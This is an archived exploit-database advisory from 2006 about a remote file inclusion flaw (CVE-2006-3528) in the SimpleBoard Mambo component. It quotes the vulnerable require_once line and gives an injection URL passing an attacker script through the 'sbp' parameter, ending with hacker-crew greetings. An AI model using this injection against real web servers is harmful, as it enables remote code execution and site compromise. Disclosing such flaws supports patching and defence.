SimpleBoard Mambo Component <= 1.1.0 - Remote Include Vulnerability

2006-07-08T00:00:00
ID EDB-ID:1994
Type exploitdb
Reporter h4ntu
Modified 2006-07-08T00:00:00

Description

SimpleBoard Mambo Component <= 1.1.0 Remote Include Vulnerability. CVE-2006-3528. Webapps exploit for php platform

                                        
                                            Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility

download : http://mamboxchange.com/frs/download.php/6920/Simpleboard-1.1.0-Stable.zip
bug found in file file_upload.php :

require_once("$sbp/sb_helpers.php");
inject :
http://website.com/components/com_simpleboard/image_upload.php?sbp=[evil_script]


Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink 

# milw0rm.com [2006-07-08]